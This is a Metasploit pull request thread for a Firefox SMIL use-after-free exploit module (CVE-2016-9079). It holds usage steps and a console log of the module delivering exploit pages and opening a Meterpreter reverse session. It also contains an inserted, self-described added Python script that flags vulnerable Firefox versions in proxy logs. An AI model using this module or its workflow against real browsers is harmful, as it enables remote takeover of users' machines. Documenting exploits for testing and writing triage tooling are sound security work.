
Firefox nsSMILTimeContainer::NotifyTimeChange() rce (CVE 2016-9079) #7852

Merged
merged 5 commits into from Jan 23, 2017

Conversation

wwebb-r7
Copy link
Contributor

@wwebb-r7 wwebb-r7 commented Jan 20, 2017

This exploits the use after free condition targeted by the leaked Tor Browser Bundle exploit originally located here. This module was created by reversing and porting the leaked exploit to target vanilla Firefox on Windows, which uses jemalloc and can be more reliably exploited than TBB with its current allocator.

The module currently supports Firefox releases from approximately 38-41. I intend to add support for more releases in the future (other people are welcome to contribute) but I just wanted to get it out there for now. I'm also fine with changing the module ranking if need be, since it's sort of confusing as to what category it'd fall in.

It must be said that this wouldn't have been completed in any reasonable amount of time without the support from and hard work of a certain individual. You deserve all the credit.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/browser/firefox_smil_uaf
  • set payload [PREFERRED PAYLOAD]
  • set [PAYLOAD OPTIONS]
  • OPTIONAL set UsePostHTML true see note at bottom
  • run
  • You should get something like this:
    sessions
  • Verify it works

100% reliability is not possible, though it should be close. If it doesn't work, rinse and repeat.

  • I included an option titled UsePostHTML that will render whatever page you like on the target after exploit completion. It's mentioned in the module doc, but if you want to test it out, edit $datadirectory/exploits/firefox_smil_uaf/post.html - the included example is probably of no use to anyone.

@wchen-r7
Copy link
Contributor

Hi @wwebb-r7, excellent work! What version of FF did you test it on during development? Thanks.

@wchen-r7 wchen-r7 self-assigned this Jan 20, 2017
@wwebb-r7
Copy link
Contributor Author

38.0 in particular, but I have a lot more installations. I'll try to get a list together of each version I've verified it on.

@wchen-r7
Copy link
Contributor

Thanks. I will test this on 38.0.

@wwebb-r7
Copy link
Contributor Author

Confirmed working on my end: 38.0 39.0 40.0 41.0. I didn't test any minor releases in between those.

42.0+ will be soon.

@wchen-r7
Copy link
Contributor

This works for me:

msf exploit(firefox_smil_uaf) > [*] Using URL: http://192.168.146.1:8080/86zTw11
[*] Server started.
[*] 192.168.146.177  firefox_smil_uaf - Got request: /86zTw11
[*] 192.168.146.177  firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
[*] 192.168.146.177  firefox_smil_uaf - Sending exploit HTML ...
[*] 192.168.146.177  firefox_smil_uaf - Got request: /86zTw11/worker.js
[*] 192.168.146.177  firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
[*] 192.168.146.177  firefox_smil_uaf - Sending worker thread Javascript ...
[*] Sending stage (957487 bytes) to 192.168.146.177
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.177:49263) at 2017-01-23 11:48:53 -0600
[*] Session ID 1 (192.168.146.1:4444 -> 192.168.146.177:49263) processing InitialAutoRunScript 'migrate -f'
[*] Running module against WIN-6NH0Q8CJQVM
[*] Current server process: firefox.exe (2660)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2780

I tested 10 times. And it was 50% successful:

  1. Hangs
  2. Crash
  3. Successful
  4. Crash
  5. Hangs
  6. Hangs
  7. Successful
  8. Successful
  9. Successful
  10. Successful

Sometimes it would hang, I'm not sure if it was because I didn't wait long enough or it was just a hit and miss type of thing.
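From a defender's side, the useful data points in this thread are the Firefox release range the module currently targets (38 through 41, per the opening post and the follow-up test list) and the Gecko User-Agent format visible in the console output above. The following is an added example, not code from this pull request or from the Metasploit module, that parses a constructed proxy log and flags Windows clients whose Firefox version falls inside that target range so they can be prioritised for patching. The log line format, the client addresses and the `triage_proxy_log` helper are assumptions made for this example; the version bounds come from the thread and describe the module's support, not the full set of releases affected by the underlying bug.

```python
import re
from typing import Dict, Optional, Tuple

# Major versions the module in this thread reports as supported (38 through 41).
# This is the exploit's stated target range, not a full vulnerability range.
TARGET_MAJOR_MIN = 38
TARGET_MAJOR_MAX = 41

# "Firefox/41.0" token as seen in the Gecko User-Agent strings logged above.
_FIREFOX_RE = re.compile(r"\bFirefox/(\d+)\.(\d+)")
_WINDOWS_RE = re.compile(r"\bWindows NT\b")

# Assumed log format: "<timestamp> <client_ip> \"<user_agent>\"".
_LOG_RE = re.compile(r'^(\S+)\s+(\S+)\s+"(.*)"$')

# Constructed sample log for this example; not output from the PR.
SAMPLE_PROXY_LOG = """\
2017-01-23T11:48:40 10.0.0.21 "Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
2017-01-23T11:48:41 10.0.0.22 "Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0"
2017-01-23T11:48:42 10.0.0.23 "Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
2017-01-23T11:48:43 10.0.0.24 "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"
2017-01-23T11:48:44 10.0.0.25 "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
"""


def firefox_version(user_agent: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from a Firefox User-Agent, or None if it is not Firefox."""
    m = _FIREFOX_RE.search(user_agent)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_in_target_range(user_agent: str) -> bool:
    """True for Windows Firefox builds whose major version the module claims to support."""
    version = firefox_version(user_agent)
    if version is None:
        return False
    major, _minor = version
    on_windows = _WINDOWS_RE.search(user_agent) is not None
    return on_windows and TARGET_MAJOR_MIN <= major <= TARGET_MAJOR_MAX


def triage_proxy_log(log_text: str) -> Dict[str, str]:
    """Map client IP -> "major.minor" for every client inside the target range."""
    flagged: Dict[str, str] = {}
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        client_ip, user_agent = m.group(2), m.group(3)
        if is_in_target_range(user_agent):
            major, minor = firefox_version(user_agent)
            flagged[client_ip] = f"{major}.{minor}"
    return flagged


if __name__ == "__main__":
    for ip, version in triage_proxy_log(SAMPLE_PROXY_LOG).items():
        print(f"{ip}: Firefox {version} on Windows, inside module target range")
```

The check is deliberately loose on minor versions because the thread only confirms major releases 38.0 through 41.0 and says nothing about the point releases in between; treat a hit as a patch-priority signal, not as proof of exploitability, and remember that the bug itself is not limited to the range this module happens to support.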

@wchen-r7 wchen-r7 merged commit b6d93c0 into rapid7:master Jan 23, 2017
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jan 23, 2017

Release Notes

The firefox_smil_uaf module exploits a vulnerability found in Mozilla Firefox. It exploits an out of bounds indexing/use-after-free condition in nsSMILTimeContainer::NotifyTimeChange(), which allows arbitrary code execution under the context of the user.

@wwebb-r7
Copy link
Contributor Author

A hang of a few seconds will occur on some runs. I'm getting much better reliability with smaller payloads that aren't as busy as meterpreter, and a few ideas as to why that might be. I'll look into it.

Labels
module rn-enhancement release notes enhancement